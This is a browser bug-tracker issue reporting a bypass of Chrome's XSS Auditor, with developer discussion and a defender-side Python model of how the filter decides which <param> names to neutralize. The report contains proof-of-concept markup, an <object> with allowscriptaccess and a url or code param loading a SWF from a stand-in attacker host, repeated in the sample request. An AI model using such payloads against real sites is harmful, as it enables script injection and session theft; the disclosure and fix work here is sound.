Issue 676992 link

Starred by 2 users

Issue metadata

Status: Duplicate
Merged: issue 783618
Closed: Nov 2017
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac
Pri: 3
Type: Bug


XSS Auditor bypass using object tag and url parameter

Reported by, Dec 26 2016

Issue description

I'd like to report an XSS Auditor bypass bug.
PoC is here:

<object allowscriptaccess="always">
<param name="url" value="https://attacker/xss.swf">

Could you confirm this bug?

Version 57.0.2962.0 (Official Build) canary (64 bit)
It seems it works via the name="code" also.

<object allowscriptaccess="always">
<param name="code" value="https://attacker/xss.swf">
Components: Blink>SecurityFeature
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
Status: Assigned (was: Unconfirmed)
Thanks for the report. Tom, could you take a look when you get a chance?
Status: Started (was: Assigned)
Looks like there are a few more <param> cases to cover.  Thanks for the report.
I'm also going to filter the allowscriptaccess attribute in <object>, just because, even though there's enough malice that can be accomplished even without it. is where we decide which name=xxx parameters are candidates for sanitization. has its own ideas about URL parameters. 

Mike, should we unify the two?  Have a suggestion about who else might weigh in on param element behaviour?
Mike: |allowscriptaccessAttr| token doesn't exist, can we add this to whatever IDL generates these?
Bouncing to mike to get some answers.  Pls re-assign to me afterwards.

Comment 9 by, Feb 23 2017

Labels: xssauditor

Comment 10 by, Feb 24 2017

Labels: OS-Android OS-Chrome OS-Linux OS-Mac OS-Windows Pri-3
I missed this, apologies:

1.  I don't think we handle `allowscriptaccess` in Blink today; we just hand all the params over to the plugin and let it figure out what it ought to be doing with them. Feel free to add it to `Source/core/html/HTMLAttributeNames.json5`.

2.  I think unifying the URL parameter behavior makes sense. Do you have a concrete suggestion for doing so?
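The two comments above describe the mechanism behind this report: the filter only neutralizes <param> elements whose name is on a list of resource-loading names, so a name it does not know (here "url" and "code") passes untouched. The following is an added defender-side model of that decision, written for this thread; it is not Blink's XSSAuditor code and nothing the commenters posted. The two name sets, the "about:blank" replacement and the sample request/response are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Simplified model of how a reflected-XSS filter decides whether an <object>/<param>
# in a response came from the request. It is not Blink's XSSAuditor code; the two
# name sets below are assumptions chosen to show why omitting "url"/"code" matters.
NARROW_PARAM_NAMES = frozenset({"movie", "src"})                 # assumed pre-fix list
WIDE_PARAM_NAMES = NARROW_PARAM_NAMES | {"url", "code", "data"}  # adds the names in this report

# Attribute order name-then-value is assumed; a real tokenizer would not need that.
PARAM_RE = re.compile(r'<param\b[^>]*\bname="([^"]*)"[^>]*\bvalue="([^"]*)"[^>]*>', re.I)
OBJECT_RE = re.compile(r'<object\b[^>]*>', re.I)
ALLOWSCRIPTACCESS_RE = re.compile(r'\s+allowscriptaccess="[^"]*"', re.I)

def decoded_query(request_url: str) -> str:
    """Percent-decoded query string; markup that appears verbatim in it is treated as reflected."""
    return unquote_plus(urlsplit(request_url).query)

def sanitize_object_markup(request_url, html, resource_params=WIDE_PARAM_NAMES):
    """Return (sanitized_html, findings). Only <param> tags whose name is in
    resource_params and that are reflected from the request are neutralized."""
    reflected = decoded_query(request_url)
    findings = []

    def fix_object(m):
        tag = m.group(0)
        if tag in reflected and ALLOWSCRIPTACCESS_RE.search(tag):
            findings.append("allowscriptaccess removed from reflected <object>")
            return ALLOWSCRIPTACCESS_RE.sub("", tag)
        return tag

    def fix_param(m):
        tag, name = m.group(0), m.group(1).lower()
        if tag in reflected and name in resource_params:
            findings.append(f"param name={name} neutralized")
            start, end = m.start(2) - m.start(), m.end(2) - m.start()
            return tag[:start] + "about:blank" + tag[end:]   # replacement value is this model's choice
        return tag

    html = OBJECT_RE.sub(fix_object, html)
    html = PARAM_RE.sub(fix_param, html)
    return html, findings

# Constructed sample: the reporter's fragment reflected into a search results page.
SAMPLE_REQUEST = ('https://example.test/search?q=<object allowscriptaccess="always">'
                  '<param name="url" value="https://attacker/xss.swf">')
SAMPLE_RESPONSE = ('<p>Results for: <object allowscriptaccess="always">'
                   '<param name="url" value="https://attacker/xss.swf"></p>')

if __name__ == "__main__":
    for names in (NARROW_PARAM_NAMES, WIDE_PARAM_NAMES):
        out, findings = sanitize_object_markup(SAMPLE_REQUEST, SAMPLE_RESPONSE, names)
        print(sorted(names), findings)
        print(out)
```

With the narrow list the reflected name="url" param keeps its value even though the allowscriptaccess attribute is stripped; with the widened list the resource reference is replaced as well.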
Labels: Hotlist-EnamelAndFriendsFixIt
Mergedinto: 783618
Status: Duplicate (was: Started)
Oddly enough, this came in again recently.  Doing the uncool thing of duping the old into the new, because that's where the work is happening.
